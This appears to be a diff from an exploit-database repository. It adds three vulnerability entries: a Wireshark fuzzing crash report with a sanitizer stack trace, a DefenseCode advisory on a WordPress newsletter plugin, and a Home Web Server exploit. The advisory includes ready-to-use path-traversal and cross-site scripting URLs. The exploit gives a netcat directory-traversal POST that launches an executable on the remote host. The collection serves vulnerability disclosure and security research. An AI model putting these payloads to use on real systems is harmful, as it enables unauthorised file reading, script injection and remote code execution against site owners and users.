Running on Linux 4.10.9-1-ARCH, with Intel(R) Core(TM) i7-6700HQ CPU @ 2.60GHz
|
||||
(with SSE4.2), with 31996 MB of physical memory, with locale C, with libpcap
|
||||
version 1.8.1, with GnuTLS 3.5.11, with Gcrypt 1.7.6, with zlib 1.2.11.
|
||||
|
||||
Built using clang 4.2.1 Compatible Clang 4.0.0 (tags/RELEASE_400/final).
|
||||
--
|
||||
A problem was found by the oss-fuzz project:
|
||||
https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=1216
|
||||
|
||||
Attached is the sample that triggers this error which can be reproduced with an
|
||||
ASAN+UBSAN build of Wireshark ("tshark -Vr test.pcap").
|
||||
--
|
||||
epan/wmem/wmem_map.c:419:57: runtime error: null pointer passed as argument 1, which is declared to never be null
|
||||
/usr/include/string.h:395:33: note: nonnull attribute specified here
|
||||
#0 0x7fb58924ef44 in wmem_str_hash epan/wmem/wmem_map.c:419:50
|
||||
#1 0x7fb58924c175 in wmem_map_lookup epan/wmem/wmem_map.c:252:23
|
||||
#2 0x7fb588c1e589 in ros_try_string ./asn1/ros/packet-ros-template.c:148:49
|
||||
#3 0x7fb588c1e392 in call_ros_oid_callback ./asn1/ros/packet-ros-template.c:211:13
|
||||
#4 0x7fb5887d9a35 in call_idmp_oid_callback ./asn1/idmp/packet-idmp-template.c:122:18
|
||||
#5 0x7fb5887da428 in dissect_idmp_T_result ./asn1/idmp/packet-idmp-fn.c:229:9
|
||||
#6 0x7fb585b43a53 in dissect_ber_sequence epan/dissectors/packet-ber.c:2399:17
|
||||
#7 0x7fb5887d93fb in dissect_idmp_IdmResult ./asn1/idmp/packet-idmp-fn.c:245:12
|
||||
#8 0x7fb585b4987e in dissect_ber_choice epan/dissectors/packet-ber.c:2901:21
|
||||
#9 0x7fb5887d91cd in dissect_idmp_IDM_PDU ./asn1/idmp/packet-idmp-fn.c:415:12
|
||||
#10 0x7fb5887d90dc in dissect_idmp ./asn1/idmp/packet-idmp-template.c:226:9
|
||||
#11 0x7fb587b769bb in tcp_dissect_pdus epan/dissectors/packet-tcp.c:3505:13
|
||||
#12 0x7fb5887d7b3c in dissect_idmp_tcp ./asn1/idmp/packet-idmp-template.c:244:5
|
||||
#13 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
|
||||
#14 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
|
||||
#15 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#16 0x7fb587b78d2d in decode_tcp_ports epan/dissectors/packet-tcp.c:5430:9
|
||||
#17 0x7fb587b8420b in process_tcp_payload epan/dissectors/packet-tcp.c:5499:13
|
||||
#18 0x7fb587b7c30c in dissect_tcp_payload epan/dissectors/packet-tcp.c:5575:9
|
||||
#19 0x7fb587ba2649 in dissect_tcp epan/dissectors/packet-tcp.c:6440:13
|
||||
#20 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
|
||||
#21 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
|
||||
#22 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#23 0x7fb5869d32ac in ip_try_dissect epan/dissectors/packet-ip.c:1854:7
|
||||
#24 0x7fb5869e2236 in dissect_ip_v4 epan/dissectors/packet-ip.c:2315:10
|
||||
#25 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
|
||||
#26 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
|
||||
#27 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#28 0x7fb589484e09 in dissector_try_uint epan/packet.c:1353:9
|
||||
#29 0x7fb586451733 in dissect_ethertype epan/dissectors/packet-ethertype.c:267:21
|
||||
#30 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
|
||||
#31 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
|
||||
#32 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
|
||||
#33 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
|
||||
#34 0x7fb58644d90e in dissect_eth_common epan/dissectors/packet-eth.c:536:5
|
||||
#35 0x7fb586443197 in dissect_eth epan/dissectors/packet-eth.c:800:5
|
||||
#36 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
|
||||
#37 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
|
||||
#38 0x7fb5894838cd in dissector_try_uint_new epan/packet.c:1329:8
|
||||
#39 0x7fb586585b27 in dissect_frame epan/dissectors/packet-frame.c:521:11
|
||||
#40 0x7fb58949a0ad in call_dissector_through_handle epan/packet.c:684:8
|
||||
#41 0x7fb5894848af in call_dissector_work epan/packet.c:759:9
|
||||
#42 0x7fb5894934c7 in call_dissector_only epan/packet.c:2992:8
|
||||
#43 0x7fb58947b674 in call_dissector_with_data epan/packet.c:3005:8
|
||||
#44 0x7fb58947a694 in dissect_record epan/packet.c:567:3
|
||||
#45 0x7fb58940ae58 in epan_dissect_run_with_taps epan/epan.c:474:2
|
||||
#46 0x564f18286ec6 in process_packet_single_pass tshark.c:3395:5
|
||||
#47 0x564f1828009e in load_cap_file tshark.c:3232:11
|
||||
#48 0x564f18277e7b in main tshark.c:1954:13
|
||||
#49 0x7fb57af42510 in __libc_start_main (/usr/lib/libc.so.6+0x20510)
|
||||
#50 0x564f18165709 in _start (run/tshark+0xd1709)
|
||||
|
||||
SUMMARY: AddressSanitizer: undefined-behavior epan/wmem/wmem_map.c:419:57 in
|
||||
|
||||
|
||||
Proof of Concept:
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42124.zip
|
143
platforms/php/webapps/42129.txt
Executable file
143
platforms/php/webapps/42129.txt
Executable file
|
@ -0,0 +1,143 @@
|
|||
DefenseCode WebScanner DAST Advisory
|
||||
WordPress Tribulant Newsletters Plugin
|
||||
Multiple Security Vulnerabilities
|
||||
|
||||
|
||||
Advisory ID: DC-2017-01-012
|
||||
Advisory Title: WordPress Tribulant Newsletters Plugin
|
||||
Multiple Vulnerabilities
|
||||
Advisory URL: http://www.defensecode.com/advisories.php
|
||||
Software: WordPress Tribulant Newsletters Plugin
|
||||
Language: PHP
|
||||
Version: 4.6.4.2 and below
|
||||
Vendor Status: Vendor contacted, update released
|
||||
Release Date: 2017/05/29
|
||||
Risk: Medium
|
||||
|
||||
|
||||
|
||||
1. General Overview
|
||||
===================
|
||||
During the security audit of Tribulant Newsletters plugin for
|
||||
WordPress CMS, multiple vulnerabilities were discovered using
|
||||
DefenseCode WebScanner application security analysis platform.
|
||||
|
||||
More information about WebScanner is available at URL:
|
||||
http://www.defensecode.com
|
||||
|
||||
|
||||
2. Software Overview
|
||||
====================
|
||||
According to the authors, WordPress Tribulant Newsletters plugin is a
|
||||
full-featured newsletter plugin for WordPress which fulfils all
|
||||
subscribers, emails, marketing and newsletter related needs for both
|
||||
personal and business environments.
|
||||
|
||||
According to wordpress.org, it has more than 9,000 active installs.
|
||||
|
||||
Homepage:
|
||||
https://wordpress.org/plugins/newsletters-lite/
|
||||
http://tribulant.com/plugins/view/1/wordpress-newsletter-plugin
|
||||
|
||||
|
||||
3. Vulnerability Description
|
||||
==================================
|
||||
During the security analysis, WebScanner discovered File Disclosure
|
||||
vulnerability and multiple Cross Site Scripting vulnerabilities in
|
||||
Tribulant Newsletters plugin.
|
||||
|
||||
3.1 File Disclosure
|
||||
----
|
||||
Input: $_GET['file']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlmethod=exportdownload&file=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cWINDOWS%5cwin.ini
|
||||
|
||||
3.2 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['method']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=check-expired%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
||||
|
||||
3.3 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['id']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
||||
Note: Subscriber id (parameter "id") must exist. Value 1 is a good guess for start
|
||||
|
||||
3.4 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['id']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-lists&method=view&id=1%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
||||
|
||||
3.5 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['value']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin-ajax.php?action=newsletters_gauge&value=1});alert(1);</script>
|
||||
|
||||
3.6 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['order']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&orderby=theme_id&order=%22%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E
|
||||
|
||||
3.7 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['wpmlsearchterm']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-history&wpmlsearchterm=x%5C%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
||||
|
||||
3.8 Cross-Site Scripting
|
||||
----
|
||||
Input: $_GET['wpmlmessage']
|
||||
Vulnerable URL:
|
||||
http://vulnerablesite.com/wp-admin/admin.php?page=newsletters-subscribers&wpmlupdated=true&wpmlmessage=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
|
||||
|
||||
|
||||
4. Solution
|
||||
===========
|
||||
Vendor resolved the security issues after we reported the
|
||||
vulnerabilities. All users are strongly advised to update WordPress
|
||||
Tribulant Newsletters plugin to the latest available version.
|
||||
|
||||
|
||||
5. Credits
|
||||
==========
|
||||
Discovered with DefenseCode WebScanner security analyzer
|
||||
by Neven Biruski.
|
||||
|
||||
|
||||
6. Disclosure Timeline
|
||||
======================
|
||||
2017/04/04 Vendor contacted
|
||||
2017/04/06 Vendor responded, update released
|
||||
2017/05/29 Advisory released to the public
|
||||
|
||||
|
||||
7. About DefenseCode
|
||||
====================
|
||||
DefenseCode L.L.C. delivers products and services designed to analyze
|
||||
and test web, desktop and mobile applications for security
|
||||
vulnerabilities.
|
||||
|
||||
DefenseCode ThunderScan is a SAST (Static Application Security
|
||||
Testing, WhiteBox Testing) solution for performing extensive security
|
||||
audits of application source code. ThunderScan SAST performs fast and
|
||||
accurate analyses of large and complex source code projects delivering
|
||||
precise results and low false positive rate.
|
||||
|
||||
DefenseCode WebScanner is a DAST (Dynamic Application Security
|
||||
Testing, BlackBox Testing) solution for comprehensive security audits
|
||||
of active web applications. WebScanner will test a website's security
|
||||
by carrying out a large number of attacks using the most advanced
|
||||
techniques, just as a real attacker would.
|
||||
|
||||
Subscribe for free software trial on our website
|
||||
http://www.defensecode.com/ .
|
||||
|
||||
E-mail: defensecode[at]defensecode.com
|
||||
|
||||
Website: http://www.defensecode.com
|
||||
Twitter: https://twitter.com/DefenseCode/
|
46
platforms/windows/remote/42128.txt
Executable file
46
platforms/windows/remote/42128.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
# Exploit Title: Home Web Server 1.9.1 build 164 - CGI Remote Code Execution
|
||||
# Date: 26/05/2017
|
||||
# Exploit Author: Guillaume Kaddouch
|
||||
# Twitter: @gkweb76
|
||||
# Blog: https://networkfilter.blogspot.com
|
||||
# GitHub: https://github.com/gkweb76/exploits
|
||||
# Vendor Homepage: http://downstairs.dnsalias.net/ (does not exist anymore)
|
||||
# Software Link: http://download.cnet.com/Home-Web-Server/3000-2648_4-10652679.html
|
||||
# Version: 1.9.1 (build 164)
|
||||
# Tested on: Windows 7 SP1 Family x64 (FR)
|
||||
# Category: Webapps
|
||||
|
||||
"""
|
||||
Disclosure Timeline:
|
||||
--------------------
|
||||
2017-05-26: Vulnerability discovered
|
||||
2017-05-26: Vendor website is down, no way to contact him
|
||||
|
||||
|
||||
Description :
|
||||
-------------
|
||||
Home Web Server allows to call cgi programs via POST which are located into /cgi-bin folder. However by using a directory traversal,
|
||||
it is possible to run any executable being on the remote host.
|
||||
|
||||
|
||||
Instructions:
|
||||
-------------
|
||||
- Starts Home Web Server.
|
||||
- Run this exploit from a remote Kali machine with netcat as below.
|
||||
"""
|
||||
|
||||
# Connect with netcat, then drop a single POST to call the executable you want
|
||||
guillaume@kali:~/kiwi_syslog$ nc 10.0.0.100 80
|
||||
POST /cgi-bin/../../../../../../../../Windows/system32/calc.exe HTTP/1.1
|
||||
|
||||
# Returned response
|
||||
HTTP/1.1 400 Bad Request
|
||||
Connection: close
|
||||
Content-Length: 0
|
||||
Server: My Web Server (HWS164)
|
||||
|
||||
"""
|
||||
[CTRL+C] : this is important to launch the executable we requested
|
||||
|
||||
Calc.exe has been launched on the remote host.
|
||||
"""
|
Loading…
Add table
Reference in a new issue